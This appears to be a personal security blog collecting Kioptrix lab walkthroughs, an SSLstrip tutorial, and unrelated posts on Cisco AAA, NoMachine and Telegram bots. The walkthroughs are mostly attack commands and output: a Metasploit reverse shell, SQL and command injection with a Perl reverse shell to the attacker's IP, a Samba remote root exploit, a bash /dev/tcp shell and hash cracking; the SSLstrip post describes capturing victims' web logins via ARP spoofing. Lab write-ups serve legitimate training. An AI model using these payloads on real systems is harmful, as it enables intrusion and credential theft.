Monday, January 28, 2019

Kioptrix Level 3

netdiscover -r 123.123.123.0/24
123.123.123.107 00:0c:29:d7:ef:9f      1      60  VMware, Inc.

nmap -T4 -A -v 123.123.123.107
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:D7:EF:9F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.002 days (since Wed Oct  3 18:02:38 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


http://123.123.123.107/

msf > search lotuscms

Matching Modules
================

   Name                              Disclosure Date  Rank       Description
   ----                              ---------------  ----       -----------
   exploit/multi/http/lcms_php_exec  2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution


msf >


msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(lcms_php_exec) >

msf exploit(lcms_php_exec) > set rhost 123.123.123.107
rhost => 123.123.123.107
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set lhost 123.123.123.201
lhost => 123.123.123.201
msf exploit(lcms_php_exec) > set URI /
URI => /

msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    123.123.123.107  yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  123.123.123.201  yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0



msf exploit(lcms_php_exec) > exploit

[*] Started reverse TCP handler on 123.123.123.201:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (123.123.123.201:4444 -> 123.123.123.107:57090) at 2018-10-03 23:37:34 +0700


id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


echo "import pty; pty.spawn('/bin/bash')" > /tmp/vnkk.py
python /tmp/vnkk.py
www-data@Kioptrix3:/home/www/kioptrix3.com$

www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat /home/www/kioptrix3.com/gallery/gconfig.php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}

}
}

?>
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$




http://123.123.123.107/phpmyadmin/
User: root
Password: fuckeyou

1 dreg 0d3eccfb887aabd50f243b3f155c0f85

2 loneferret 5badcaf789d3d1d09794d8f021f40f0e



vim md5.txt
0d3eccfb887aabd50f243b3f155c0f85
5badcaf789d3d1d09794d8f021f40f0e
hashcat -m 0 md5.txt /usr/share/wordlists/rockyou.txt

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
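Why the hashcat run above finishes almost at once, as an added example that is not part of the original post: the two hashes read from phpMyAdmin are unsalted MD5, so one digest per guess is compared against every account, and the same code shows the salted scrypt storage that would have made this cost real work. The wordlist is constructed; the hash values are the ones shown in the post.

```python
import hashlib
import hmac
import os

# The two hashes as read from phpMyAdmin in the post, and a small constructed
# wordlist standing in for rockyou.txt.
HASHES = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}
WORDLIST = ["123456", "password", "starwars", "letmein", "Mast3r", "qwerty"]

def crack_md5(hashes, wordlist):
    """Unsalted MD5: one digest per guess is checked against every account at
    once, and two users with the same password would share the same hash."""
    by_hash = {h.lower(): user for user, h in hashes.items()}
    found = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        if digest in by_hash:
            found[by_hash[digest]] = word
    return found

SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1   # about 16 MiB of memory per guess

def hash_password(password, salt=None):
    """Hardened form: a random per-user salt and a memory-hard KDF, so every
    guess costs real work and has to be repeated for each account."""
    salt = salt if salt is not None else os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, n=SCRYPT_N, r=SCRYPT_R,
                         p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_N}${salt.hex()}${key.hex()}"

def verify_password(password, stored):
    _, n, salt_hex, key_hex = stored.split("$")
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         n=int(n), r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return hmac.compare_digest(key.hex(), key_hex)   # constant-time comparison
```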

Kioptrix Level 2

netdiscover -r 123.123.123.0/24

123.123.123.101 00:0c:29:9c:4b:ac      1      60  VMware, Inc.

nmap -T4 -A -v 123.123.123.101

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            655/udp  status
|_  100024  1            658/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2018-10-01T18:52:15+00:00; +10h50m06s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:9C:4B:AC (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 - 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Uptime guess: 49.709 days (since Sun Aug 12 22:01:26 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: mean: 10h50m05s, deviation: 0s, median: 10h50m05s


http://123.123.123.101/

The Remote System Administration Login web page was tested for SQL injection, and it was found that using 1' or '1' = '1 as the username and password


1' or '1' = '1
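An added example, not from the post and not the application's real code (its schema is not shown): a login check built by string concatenation, which the payload above turns into a WHERE clause that is always true, beside the parameterized version that treats the same input as plain data. The SQLite table and its admin row are constructed.

```python
import sqlite3

# Constructed stand-in for the login's user table; the real schema is not shown.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return db

def build_query_vulnerable(username, password):
    """String concatenation: the quote in the input closes the literal and the
    rest of the payload becomes part of the WHERE clause."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_vulnerable(db, username, password):
    row = db.execute(build_query_vulnerable(username, password)).fetchone()
    return row is not None

def login_parameterized(db, username, password):
    """Bound parameters: the driver passes the input as data, so the same
    payload is compared literally against the column and matches nothing."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

PAYLOAD = "1' or '1' = '1"   # the value the post enters in both fields
```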


After logging in, we try command injection:


;perl -e 'use Socket;$i="123.123.123.201";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

root@KaliLNX:/opt/VMs/Kioptrix_Level_2# nc -nlvp 443
listening on [any] 443 ...

connect to [123.123.123.201] from (UNKNOWN) [123.123.123.101] 32770
bash: no job control in this shell
bash-3.00$ bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$


cd /tmp


gcc -Wall -o linux-sendpage 9545.c
bash-3.00$ gcc -Wall -o linux-sendpage 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls -l
total 28
-rw-r--r--  1 apache apache 9783 Sep 26 04:36 9545.c
-rwxr-xr-x  1 apache apache 6762 Sep 25 21:24 e
-rwxr-xr-x  1 apache apache 6762 Oct  1 15:16 linux-sendpage
bash-3.00$

./linux-sendpage
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00#




Kioptrix Level 1

root@KaliLNX:~# netdiscover -r 123.123.123.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 123.123.123.100 00:0c:29:d5:d9:e9      1      60  VMware,Inc.

nmap -T4 -A -v 123.123.123.100

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: VMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-10-01T21:16:49+00:00; +14h01m47s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:D5:D9:E9 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Mon Oct  1 14:12:01 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros


Let's attack the Samba service: 139/tcp  open  netbios-ssn Samba smbd (workgroup: VMYGROUP)


/usr/share/exploitdb/platforms/

searchsploit samba |grep 2.2
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution    multiple/remote/10.c

cp /usr/share/exploitdb/platforms/multiple/remote/10.c .
gcc 10.c -o samba-2.2.1a-exploit
root@KaliLNX:/opt/VMs/Kioptrix_Level_1# ./samba-exploit
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./samba-exploit [-bBcCdfprsStv] [host]

-b    bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B    bruteforce steps (default = 300)
-c    connectback ip address
-C    max childs for scan/bruteforce mode (default = 40)
-d    bruteforce/scanmode delay in micro seconds (default = 100000)
-f    force
-p    port to attack (default = 139)
-r    return address
-s    scan mode (random)
-S    scan mode
-t    presets (0 for a list)
-v    verbose mode



root@KaliLNX:/opt/VMs/Kioptrix_Level_1# ./samba-2.2.1a-exploit -b 0 123.123.123.100
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)


* On our Kali:
nc -nlvp 4444

* On the victim shell
bash -i >& /dev/tcp/123.123.123.201/4444 0>&1

* Go back to our Kali:
root@KaliLNX:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [123.123.123.201] from (UNKNOWN) [123.123.123.100] 1025
bash: no job control in this shell
[root@kioptrix tmp]#

[root@kioptrix tmp]# pwd
pwd
/tmp
[root@kioptrix tmp]# ls -la
ls -la
total 2
drwxrwxrwt    2 root     root         1024 Oct  1 17:29 .
drwxr-xr-x   19 root     root         1024 Oct  1 17:13 ..
[root@kioptrix tmp]#


Saturday, July 8, 2017

Configure Authentication With TACACS and Radius

Diagram
1. On PC


2. On Server TACACS+

3. On Server Radius

4. On Router, R1

configure terminal
hostname R1
!
interface GigabitEthernet0/0
 ip address 192.168.2.1 255.255.255.0
 no shutdown
!
interface GigabitEthernet0/1
 ip address 192.168.1.1 255.255.255.0
 no shutdown
!
! Local account, reached only when both AAA servers are unreachable
ip domain-name cisco.com
username admin password cisco
enable secret cisco
! The line after "crypto key generate rsa" answers the modulus-size prompt
crypto key generate rsa
1024
!
! aaa new-model must be entered before "login authentication" is accepted on the vty lines.
! Method list AUTH tries TACACS+, then RADIUS, then the local database; IOS moves on to the
! next method only when a server does not answer, not when it rejects the credentials.
aaa new-model
aaa authentication login AUTH group tacacs+ group radius local
tacacs-server host 192.168.1.2
tacacs-server key TACACS123
radius-server host 192.168.1.3
radius-server key RADIUS123
!
line vty 0 4
 login authentication AUTH
 transport input ssh
 privilege level 15
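To make concrete what the radius-server key on R1 protects, here is an added example (not part of the post and not a real RADIUS client): it builds an Access-Request for the post's admin/cisco account using the post's shared secret RADIUS123, hides the PAP password as RFC 2865 specifies, and checks a reply's Response Authenticator, which is the only thing that ties an Access-Accept to a server holding the same key and to this particular request.

```python
import hashlib
import os
import struct

SECRET = b"RADIUS123"   # the "radius-server key" configured on R1

def _xor_chain(secret, request_auth, data, ciphertext_in):
    """RFC 2865 s.5.2 keystream: b1 = MD5(secret + RA), b_i = MD5(secret + c_{i-1}).
    The chain is driven by the ciphertext chunks, so hiding and revealing share it."""
    out, prev = b"", request_auth
    for i in range(0, len(data), 16):
        b = hashlib.md5(secret + prev).digest()
        chunk = bytes(x ^ y for x, y in zip(data[i:i + 16], b))
        out += chunk
        prev = data[i:i + 16] if ciphertext_in else chunk
    return out

def hide_password(secret, request_auth, password):
    padded = password + b"\x00" * (-len(password) % 16)   # pad to 16-byte blocks
    return _xor_chain(secret, request_auth, padded, ciphertext_in=False)

def reveal_password(secret, request_auth, hidden):
    return _xor_chain(secret, request_auth, hidden, ciphertext_in=True).rstrip(b"\x00")

def _attr(attr_type, value):
    return struct.pack("!BB", attr_type, len(value) + 2) + value

def build_access_request(secret, ident, username, password, request_auth=None):
    """Code 1 packet carrying User-Name (1) and the hidden User-Password (2)."""
    ra = request_auth or os.urandom(16)
    attrs = _attr(1, username) + _attr(2, hide_password(secret, ra, password))
    return struct.pack("!BBH", 1, ident, 20 + len(attrs)) + ra + attrs

def _response_auth(secret, code, ident, request_auth, attrs):
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()

def build_response(secret, code, ident, request_auth, attrs=b""):
    """Server side: 2 = Access-Accept, 3 = Access-Reject, bound to the request."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return header + _response_auth(secret, code, ident, request_auth, attrs) + attrs

def verify_response(secret, request_auth, packet):
    """Client side: accept the reply only if its authenticator was computed with
    our secret over our Request Authenticator; anything else is forged or stale."""
    code, ident, length = struct.unpack("!BBH", packet[:4])
    attrs = packet[20:length]
    return packet[4:20] == _response_auth(secret, code, ident, request_auth, attrs)
```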


Wednesday, March 22, 2017

SSL Strip

Diagram:

On KALI Machine

* Open a Terminal
netdiscover

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j  REDIRECT --to-port 8080

arpspoof -i eth0 -t 10.10.1.55 -r 10.10.1.111

* Open another Terminal
sslstrip -l 8080

Once the victim machine logs in to any website with a login form, such as Facebook, Gmail or Yahoo, we will be able to see the login name and password stored in the file sslstrip.log on Kali.

* Open another Terminal
Run cat sslstrip.log to see the login name and password.

Monday, February 20, 2017

Install NoMachine

Install the NoMachine remote desktop on Kali.

1. On Windows PC
Download and install NoMachine
https://www.nomachine.com/download/download&id=17


2. On KALI
Download and install NoMachine
cd ~/Downloads
https://www.nomachine.com/download/download&id=3

dpkg -i nomachine_5.2.11_1_amd64.deb

3. Start NoMachine
Start NoMachine on Windows PC and connect to Kali

Wednesday, January 4, 2017

Create Telegram Bot

1. Search: BotFather (@BotFather)
/newbot

vnkk001_bot

After creating the new bot we will get an API token in a format similar to the one below:
Use this token to access the HTTP API:
1122334455:AAbbCCddEEff1122334455

/setdescription

/setjoingroups

Check the API Info:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/getme

Check the chat updates:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/getupdates

Send a chat message from the browser:
https://api.telegram.org/bot1122334455:AAbbCCddEEff1122334455/sendmessage?chat_id=154066828&text=TestMSG001

Why have a bot?
You can create as many bots as you want and have them work for you as robots.

In my case I created one to alert me when something goes wrong; I integrated it with Nagios through the bot API described above.

1. Create a new bot; I named it Nagios_Alert

2. Add the bot to a group (whichever group you want, and add other members as needed)

3. Integrate with Nagios so that it posts the message as the bot user,

so all the members will see the message in the group.
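One way to do the Nagios integration, as an added example and not the post's own script: a notification command calls this with the Nagios macros, and the script posts through the same sendMessage method used from the browser above. The token and chat id are placeholders in the post's format, and the script name and the notification command are assumptions.

```python
import json
import sys
import urllib.parse
import urllib.request

API_BASE = "https://api.telegram.org"
# Placeholder values in the format the post shows; the real token gives full
# control of the bot, so keep it in a file readable only by the nagios user.
BOT_TOKEN = "1122334455:AAbbCCddEEff1122334455"
CHAT_ID = "154066828"     # the group's chat id, read from the getUpdates output

def format_alert(notification_type, host, service, state, output):
    """Text built from the Nagios macros $NOTIFICATIONTYPE$, $HOSTNAME$,
    $SERVICEDESC$, $SERVICESTATE$ and $SERVICEOUTPUT$."""
    return f"[{notification_type}] {host} / {service} is {state}\n{output}"

def build_send_request(token, chat_id, text):
    """URL and form-encoded body for sendMessage. Encoding the body keeps
    newlines, '&' and '#' from the plugin output out of the query string."""
    url = f"{API_BASE}/bot{token}/sendMessage"
    body = urllib.parse.urlencode({"chat_id": chat_id, "text": text}).encode()
    return url, body

def send_alert(token, chat_id, text, opener=urllib.request.urlopen):
    """POST the message; Telegram answers {"ok": true, "result": {...}}."""
    url, body = build_send_request(token, chat_id, text)
    with opener(urllib.request.Request(url, data=body), timeout=10) as resp:
        reply = json.load(resp)
    if not reply.get("ok"):
        raise RuntimeError(f"Telegram API error: {reply.get('description')}")
    return reply["result"]

if __name__ == "__main__":
    # Hypothetical Nagios notification command:
    #   command_line  /usr/local/bin/telegram_alert.py "$NOTIFICATIONTYPE$" "$HOSTNAME$"
    #                 "$SERVICEDESC$" "$SERVICESTATE$" "$SERVICEOUTPUT$"
    if len(sys.argv) != 6:
        sys.exit("usage: telegram_alert.py TYPE HOST SERVICE STATE OUTPUT")
    send_alert(BOT_TOKEN, CHAT_ID, format_alert(*sys.argv[1:]))
```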